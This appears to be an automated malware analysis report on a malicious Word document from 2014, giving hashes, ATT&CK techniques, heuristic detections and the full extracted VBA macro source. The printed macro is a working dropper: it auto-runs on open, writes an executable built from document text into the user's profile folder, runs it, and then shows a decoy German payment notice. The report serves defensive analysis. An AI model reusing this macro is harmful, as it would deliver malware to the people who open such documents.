Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4ee4b5d585e05336…

MALICIOUS

Office (OLE)

696.0 KB Created: 2014-07-25 16:42:00 Authoring application: Microsoft Office Word First seen: 2014-08-17
MD5: 9a664a720585866da1b755cb4eab0522 SHA-1: e88861e8a2be02c0b53907d4c71faa29e4de86be SHA-256: 4ee4b5d585e0533626a0eb78594d4b9c81fce997dec008c79e5147a52d156b26
336 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_SHELL. The document body explicitly instructs the user to enable macros, a common lure for malware delivery. The VBA script, named 'macros.bas', contains a call to Shell, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection also confirms its malicious nature as a downloader.

Heuristics 14

  • MSScriptControl.ScriptControl — CVE-2015-0097 high CVE likely CVE_2015_0097_SC
    MSScriptControl.ScriptControl — CVE-2015-0097
  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
         LDlYZGUnkPeg = Shell(zIeIPjXJGC)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
         Set pmFaLXI = GetObject(, "word.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
         Auto_Open
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
         THshkdtuZtYx = Environ("USERPROFILE")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5672 bytes
SHA-256: bcc0b206ca46952c916a37bac34247bc49abc41a914ae3439bdf2b58063b90ea
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E3493C46-4ABA-4218-94ED-A0A546C62FE7}{042040A5-306E-4237-B7CD-10AB5DFFB1E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NewMacros"
Sub NkuDDQXYXQUdKNf(zIeIPjXJGC As String)
     Dim THshkdtuZtYx As String
     Dim LDlYZGUnkPeg As Integer
     THshkdtuZtYx = Environ("USERPROFILE")
     ChDrive (THshkdtuZtYx)
     ChDir (THshkdtuZtYx)

     Debug.Print "The alarm will go off in 10 seconds!"
     Debug.Print ("Before OnTime: " & Now)
     alertTime = Now + TimeValue("00:10:00")
     Application.OnTime alertTime, "EventMacro"
     Debug.Print ("After OnTime: " & Now)

     LDlYZGUnkPeg = Shell(zIeIPjXJGC)
     XzojAPd
End Sub

Sub ddjAEGpLWUs()
     Dim tczIDH As Integer
     Dim ZrBcrWYELrwPJC As String
     Dim NqXCjHetzq As String
     Dim GrhxepEK As String
     Dim QWrXicvrnpUq As String
     NqXCjHetzq = "exe"
     QWrXicvrnpUq = "hgZWJKrXclYjI"
     ZrBcrWYELrwPJC = "."
     GrhxepEK = QWrXicvrnpUq + ZrBcrWYELrwPJC + NqXCjHetzq
     tczIDH = FreeFile()
     Open GrhxepEK For Binary As tczIDH
End Sub

Sub XzojAPd()
     Word.ActiveDocument.Range.Select
     Selection.WholeStory
     Selection.Delete Unit:=wdCharacter, Count:=1
     Dim RtJEfM As Word.Document
     Set RtJEfM = ThisDocument
     RtJEfM.Range.InsertParagraphAfter
     RtJEfM.Range.InsertAfter "Datei Nr. : 51123944" + vbLf
     RtJEfM.Range.InsertAfter "" + vbLf
     RtJEfM.Range.InsertAfter "Zu bezahlen:     575,82 EUR" + vbLf
     RtJEfM.Range.InsertAfter "" + vbLf
     RtJEfM.Range.InsertAfter "Bezahlt:     0,00 EURRest:   575,82 EUR" + vbLf
     RtJEfM.Range.InsertAfter "" + vbLf
     RtJEfM.Range.InsertAfter "Rente (Datei Nr. : 51123944" + vbLf
     RtJEfM.Range.InsertAfter "" + vbLf
     RtJEfM.Range.InsertAfter "Zu bezahlen:     575,82 EUR" + vbLf
     RtJEfM.Range.InsertAfter "" + vbLf
     RtJEfM.Range.InsertAfter "Bezahlt:     0,00 EURRest:   575,82 EUR" + vbLf
     RtJEfM.Range.InsertAfter "" + vbLf
     RtJEfM.Range.InsertAfter "Rente (berechnet bis 28052014):  326,73 EUR" + vbLf
     RtJEfM.Range.InsertAfter "" + vbLf
     RtJEfM.Range.InsertAfter "Kosten:  162,46 EURZu  bezahlen (totale balans)  1 065,01 EUR" + vbLf
     RtJEfM.Range.InsertAfter "" + vbLf
End Sub

Sub AutoOpen()
     Auto_Open
End Sub

Sub ptRXFNB()
     Dim LDlYZGUnkPeg As Integer
     Dim QWrXicvrnpUq As String
     Dim DclpalrneWCTBK As Long
     Dim THshkdtuZtYx As String
     Dim nyNjCTwwjJ As String
     Dim APHkRGqfO As Boolean
     Dim fgEMiBCt As String
     Dim NqXCjHetzq As String
     Dim SOixezmlmFJnWsR As Integer
     Dim tczIDH As Integer
     Dim VTwoEc As Byte
     Dim GrhxepEK As String
     Dim jwSdPvvINqtzjee As Paragraph
     nyNjCTwwjJ = "XsTSveotalxVWX"
     QWrXicvrnpUq = "hgZWJKrXclYjI"
     ZrBcrWYELrwPJC = "."
     NqXCjHetzq = "exe"
     GrhxepEK = QWrXicvrnpUq + ZrBcrWYELrwPJC + NqXCjHetzq
     THshkdtuZtYx = Environ("USERPROFILE")
     ChDrive (THshkdtuZtYx)
     ChDir (THshkdtuZtYx)
     tczIDH = FreeFile()

     ddjAEGpLWUs

     Debug.Print "The alarm will go off in 10 seconds!"
     Debug.Print ("Before OnTime: " & Now)
     alertTime = Now + TimeValue("00:10:00")
     Application.OnTime alertTime, "EventMacro"
     Debug.Print ("After OnTime: " & Now)

     Dim BsPjfJMUB As String
     Dim vDxWPv As ScriptControl
     Dim YhNIZoY As String
     Dim MvnnjGrEMWDFz As String
     Dim fCpaaS As String
     Dim tAbZYllpSvYzV As Document
     Set vDxWPv = UserForm1.ScriptControl1
     vDxWPv.Language = "VBScript"
     MvnnjGrEMWDFz = "ActiveDocument."
     YhNIZoY = "Paragraphs"
     BsPjfJMUB = MvnnjGrEMWDFz + YhNIZoY
     Set pmFaLXI = GetObject(, "word.Application")
     On Error GoTo MkrFJHufps
     vDxWPv.AddObject "Obj", pmFaLXI

MkrFJHufps:
     For Each jwSdPvvINqtzjee In vDxWPv.Eval("Obj." & BsPjfJMUB)
          vAgjDRsWKXmbsJ (jwSdPvvINqtzjee)
          fgEMiBCt = jwSdPvvINqtzjee.Range.Text
          Debug.Print "The alarm will go off in 10 seconds!"
          Debug.Print ("Before OnTime: " & Now)
          alertTime = Now + TimeValue("00:10:00")
          Application.OnTime alertTime, "EventMacro"
          Debug.Print ("After OnTime: " & Now)
          If (APHkRGqfO = True) Then
               DclpalrneWCTBK = 1
          Dim rvrSUoruBGPPl As Integer
          rvrSUoruBGPPl = 4
               While (DclpalrneWCTBK < Len(fgEMiBCt))
                    VTwoEc = Mid(fgEMiBCt, DclpalrneWCTBK, rvrSUoruBGPPl)
                    Debug.Print ("After OnTime: " & Now)
                    Put #tczIDH, , VTwoEc
                    DclpalrneWCTBK = DclpalrneWCTBK + rvrSUoruBGPPl
               Wend
          ElseIf (InStr(1, fgEMiBCt, nyNjCTwwjJ) > 0 And Len(fgEMiBCt) > 0) Then
               Dim WaTACfFRyows As Boolean
               WaTACfFRyows = True
               APHkRGqfO = WaTACfFRyows
          End If
          Next
     Close #tczIDH
     NkuDDQXYXQUdKNf (GrhxepEK)
End Sub

Sub Workbook_Open()
     Auto_Open
End Sub

Sub Auto_Open()
     ptRXFNB
End Sub

Sub vAgjDRsWKXmbsJ(CTOzPgPotzBqTmo)
     DoEvents
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.